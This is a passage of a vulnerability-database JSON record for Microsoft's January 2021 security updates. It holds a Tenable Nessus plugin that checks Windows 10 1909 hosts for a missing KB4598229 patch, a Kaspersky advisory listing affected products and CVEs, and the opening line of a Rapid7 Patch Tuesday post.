"CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", 
"CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598229.NASL", "href": "https://www.tenable.com/plugins/nessus/144884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144884);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n 
\"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1691\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598229\");\n script_xref(name:\"MSFT\", value:\"MS21-4598229\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598229: Windows 10 Version 1909 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. 
(CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1692. (CVE-2021-1691)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598229/windows-10-update-kb4598229\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ddc88c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598229.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows 
: Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598229'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598229])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-12-22T23:24:21", "description": "### *Detect date*:\n01/12/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. 
Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Visual Studio 2019 version 16.0 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 20H2 for ARM64-based Systems \nHEVC Video Extensions \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6) \nMicrosoft Visual Studio 2019 version 16.8 \nWindows 10 Version 1803 for 32-bit Systems \nMicrosoft Remote Desktop for Android \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nMicrosoft Visual Studio 2015 Update 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows RT 8.1 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 
\nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nWindows 10 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nMicrosoft Remote Desktop \nRemote Desktop client for Windows Desktop \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1909 for x64-based Systems\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-1642](<https://nvd.nist.gov/vuln/detail/CVE-2021-1642>) \n[CVE-2021-1658](<https://nvd.nist.gov/vuln/detail/CVE-2021-1658>) \n[CVE-2021-1708](<https://nvd.nist.gov/vuln/detail/CVE-2021-1708>) \n[CVE-2021-1704](<https://nvd.nist.gov/vuln/detail/CVE-2021-1704>) \n[CVE-2021-1653](<https://nvd.nist.gov/vuln/detail/CVE-2021-1653>) \n[CVE-2021-1638](<https://nvd.nist.gov/vuln/detail/CVE-2021-1638>) \n[CVE-2021-1703](<https://nvd.nist.gov/vuln/detail/CVE-2021-1703>) \n[CVE-2021-1651](<https://nvd.nist.gov/vuln/detail/CVE-2021-1651>) \n[CVE-2021-1666](<https://nvd.nist.gov/vuln/detail/CVE-2021-1666>) \n[CVE-2021-1645](<https://nvd.nist.gov/vuln/detail/CVE-2021-1645>) \n[CVE-2021-1694](<https://nvd.nist.gov/vuln/detail/CVE-2021-1694>) \n[CVE-2021-1686](<https://nvd.nist.gov/vuln/detail/CVE-2021-1686>) \n[CVE-2021-1684](<https://nvd.nist.gov/vuln/detail/CVE-2021-1684>) \n[CVE-2021-1692](<https://nvd.nist.gov/vuln/detail/CVE-2021-1692>) \n[CVE-2021-1691](<https://nvd.nist.gov/vuln/detail/CVE-2021-1691>) \n[CVE-2021-1702](<https://nvd.nist.gov/vuln/detail/CVE-2021-1702>) \n[CVE-2021-1667](<https://nvd.nist.gov/vuln/detail/CVE-2021-1667>) \n[CVE-2021-1685](<https://nvd.nist.gov/vuln/detail/CVE-2021-1685>) 
\n[CVE-2021-1660](<https://nvd.nist.gov/vuln/detail/CVE-2021-1660>) \n[CVE-2021-1683](<https://nvd.nist.gov/vuln/detail/CVE-2021-1683>) \n[CVE-2021-1690](<https://nvd.nist.gov/vuln/detail/CVE-2021-1690>) \n[CVE-2021-1678](<https://nvd.nist.gov/vuln/detail/CVE-2021-1678>) \n[CVE-2021-1637](<https://nvd.nist.gov/vuln/detail/CVE-2021-1637>) \n[CVE-2021-1672](<https://nvd.nist.gov/vuln/detail/CVE-2021-1672>) \n[CVE-2021-1652](<https://nvd.nist.gov/vuln/detail/CVE-2021-1652>) \n[CVE-2021-1663](<https://nvd.nist.gov/vuln/detail/CVE-2021-1663>) \n[CVE-2021-1650](<https://nvd.nist.gov/vuln/detail/CVE-2021-1650>) \n[CVE-2021-1644](<https://nvd.nist.gov/vuln/detail/CVE-2021-1644>) \n[CVE-2021-1661](<https://nvd.nist.gov/vuln/detail/CVE-2021-1661>) \n[CVE-2021-1643](<https://nvd.nist.gov/vuln/detail/CVE-2021-1643>) \n[CVE-2021-1709](<https://nvd.nist.gov/vuln/detail/CVE-2021-1709>) \n[CVE-2021-1689](<https://nvd.nist.gov/vuln/detail/CVE-2021-1689>) \n[CVE-2021-1700](<https://nvd.nist.gov/vuln/detail/CVE-2021-1700>) \n[CVE-2021-1699](<https://nvd.nist.gov/vuln/detail/CVE-2021-1699>) \n[CVE-2021-1681](<https://nvd.nist.gov/vuln/detail/CVE-2021-1681>) \n[CVE-2021-1655](<https://nvd.nist.gov/vuln/detail/CVE-2021-1655>) \n[CVE-2021-1697](<https://nvd.nist.gov/vuln/detail/CVE-2021-1697>) \n[CVE-2021-1648](<https://nvd.nist.gov/vuln/detail/CVE-2021-1648>) \n[CVE-2021-1659](<https://nvd.nist.gov/vuln/detail/CVE-2021-1659>) \n[CVE-2021-1670](<https://nvd.nist.gov/vuln/detail/CVE-2021-1670>) \n[CVE-2021-1673](<https://nvd.nist.gov/vuln/detail/CVE-2021-1673>) \n[CVE-2021-1682](<https://nvd.nist.gov/vuln/detail/CVE-2021-1682>) \n[CVE-2021-1671](<https://nvd.nist.gov/vuln/detail/CVE-2021-1671>) \n[CVE-2021-1662](<https://nvd.nist.gov/vuln/detail/CVE-2021-1662>) \n[CVE-2021-1696](<https://nvd.nist.gov/vuln/detail/CVE-2021-1696>) \n[CVE-2021-1668](<https://nvd.nist.gov/vuln/detail/CVE-2021-1668>) \n[CVE-2021-1701](<https://nvd.nist.gov/vuln/detail/CVE-2021-1701>) 
\n[CVE-2021-1669](<https://nvd.nist.gov/vuln/detail/CVE-2021-1669>) \n[CVE-2021-1657](<https://nvd.nist.gov/vuln/detail/CVE-2021-1657>) \n[CVE-2021-1706](<https://nvd.nist.gov/vuln/detail/CVE-2021-1706>) \n[CVE-2021-1646](<https://nvd.nist.gov/vuln/detail/CVE-2021-1646>) \n[CVE-2021-1656](<https://nvd.nist.gov/vuln/detail/CVE-2021-1656>) \n[CVE-2021-1693](<https://nvd.nist.gov/vuln/detail/CVE-2021-1693>) \n[CVE-2021-1654](<https://nvd.nist.gov/vuln/detail/CVE-2021-1654>) \n[CVE-2021-1649](<https://nvd.nist.gov/vuln/detail/CVE-2021-1649>) \n[CVE-2021-1664](<https://nvd.nist.gov/vuln/detail/CVE-2021-1664>) \n[CVE-2021-1695](<https://nvd.nist.gov/vuln/detail/CVE-2021-1695>) \n[CVE-2021-1674](<https://nvd.nist.gov/vuln/detail/CVE-2021-1674>) \n[CVE-2021-1680](<https://nvd.nist.gov/vuln/detail/CVE-2021-1680>) \n[CVE-2021-1679](<https://nvd.nist.gov/vuln/detail/CVE-2021-1679>) \n[CVE-2021-1687](<https://nvd.nist.gov/vuln/detail/CVE-2021-1687>) \n[CVE-2021-1710](<https://nvd.nist.gov/vuln/detail/CVE-2021-1710>) \n[CVE-2021-1676](<https://nvd.nist.gov/vuln/detail/CVE-2021-1676>) \n[CVE-2021-1665](<https://nvd.nist.gov/vuln/detail/CVE-2021-1665>) \n[CVE-2021-1688](<https://nvd.nist.gov/vuln/detail/CVE-2021-1688>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *KB list*:\n[4598275](<http://support.microsoft.com/kb/4598275>) \n[4598243](<http://support.microsoft.com/kb/4598243>) \n[4598285](<http://support.microsoft.com/kb/4598285>) \n[4598278](<http://support.microsoft.com/kb/4598278>) \n[4598297](<http://support.microsoft.com/kb/4598297>) \n[4598231](<http://support.microsoft.com/kb/4598231>) \n[4598229](<http://support.microsoft.com/kb/4598229>) \n[4598242](<http://support.microsoft.com/kb/4598242>) \n[4598230](<http://support.microsoft.com/kb/4598230>) \n[4598245](<http://support.microsoft.com/kb/4598245>) \n[4601354](<http://support.microsoft.com/kb/4601354>) 
\n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>) \n[5005607](<http://support.microsoft.com/kb/5005607>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "kaspersky", "title": "KLA12045 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", 
"CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2021-09-16T00:00:00", "id": "KLA12045", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12045/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-01-15T00:48:37", "description": "\n\nWe arrive at the first Patch Tuesday of 2021 ([2021-Jan](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>)) with 83 vulnerabilities across our standard spread of products. 
